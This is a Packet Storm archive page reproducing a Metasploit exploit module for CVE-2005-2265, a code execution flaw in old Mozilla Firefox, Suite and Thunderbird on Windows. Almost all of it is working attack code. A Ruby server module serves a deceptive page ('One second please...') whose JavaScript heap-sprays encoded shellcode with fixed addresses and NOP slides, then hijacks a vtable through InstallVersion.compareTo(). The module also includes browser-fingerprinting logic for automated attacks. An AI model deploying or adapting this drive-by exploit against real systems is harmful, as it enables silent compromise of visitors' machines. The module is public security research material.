Lucene search

K
packetstormH D MoorePACKETSTORM:82261
HistoryOct 27, 2009 - 12:00 a.m.

Mozilla Firefox Code Execution

2009-10-2700:00:00
H D Moore
packetstormsecurity.com
24

0.967 High

EPSS

Percentile

99.5%

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
#  
# This module acts as an HTTP server  
#  
include Msf::Exploit::Remote::HttpServer::HTML  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::FF,  
:ua_ver => "1.0",  
:os_name => OperatingSystems::WINDOWS,  
:javascript => true,  
:rank => NormalRanking, # reliable memory corruption  
:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",  
})  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',  
'Description' => %q{  
This module exploits a code execution vulnerability in the Mozilla  
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit   
module is a direct port of Aviv Raff's HTML PoC.  
  
},  
'License' => MSF_LICENSE,  
'Author' => ['hdm', 'Aviv Raff <avivra [at] gmail.com>'],  
'Version' => '$Revision$',  
'References' =>   
[  
['CVE', '2005-2265'],  
['OSVDB', '17968'],  
['BID', '14242'],  
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],  
],  
'Payload' =>  
{  
'Space' => 400,  
'BadChars' => "\x00",  
},  
'Targets' =>  
[  
[ 'Firefox < 1.0.5 Windows',   
{  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'StackAdjustment' => -3500,  
'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ],  
  
}  
],  
],  
'DisclosureDate' => 'Jul 13 2005'  
))  
end  
  
def on_request_uri(cli, request)  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })  
  
# Handle the payload  
handler(cli)  
end  
  
def generate_html(payload)  
  
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))  
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))  
  
spray_to = sprintf("0x%.8x", target['Addrs'][0])  
spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) )  
spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) )  
eax_address = sprintf("0x%.8x", target['Addrs'][3])  
  
return %Q|  
<html>  
<head>  
<!--   
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)  
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx  
Greets: SkyLined, The Insider and shutdown   
-->  
<title>One second please...</title>  
<script language="javascript">  
  
function BodyOnLoad()   
{  
location.href="javascript:void (new InstallVersion());";  
CrashAndBurn();  
};  
  
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology  
function CrashAndBurn()   
{  
// Spray up to this address  
var heapSprayToAddress=#{spray_to};  
  
// Payload - Just return..  
var payLoadCode=unescape("#{enc_code}");  
  
// Size of the heap blocks   
var heapBlockSize=0x400000;  
  
// Size of the payload in bytes  
var payLoadSize=payLoadCode.length * 2;   
  
// Caluclate spray slides size  
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header  
  
// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C  
var spraySlide1 = unescape("#{spray_slide1}");   
  
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);   
  
var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C   
  
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);  
  
var spraySlide3 = unescape("#{enc_nops}");  
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);  
  
// Spray the heap  
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;  
//alert(spraySlide2.length); return;  
memory = new Array();  
for (i=0;i<heapBlocks;i++)   
{  
memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode:   
(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;  
}  
  
// Set address to fake "pdata".  
var eaxAddress = #{eax_address};  
  
// This was taken from shutdown's PoC in bugzilla  
// struct vtbl { void (*code)(void); };  
// struct data { struct vtbl *pvtbl; };  
//  
// struct data *pdata = (struct data *)(xxAddress & ~0x01);  
// pdata->pvtbl->code(pdata);  
//  
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));  
}  
  
function getSpraySlide(spraySlide, spraySlideSize) {  
while (spraySlide.length*2<spraySlideSize)   
{  
spraySlide+=spraySlide;  
}   
spraySlide=spraySlide.substring(0,spraySlideSize/2);  
return spraySlide;  
}  
  
// -->  
</script>  
</head>  
<body onload="BodyOnLoad()">  
</body>  
</html>  
|  
end  
  
end  
  
`

0.967 High

EPSS

Percentile

99.5%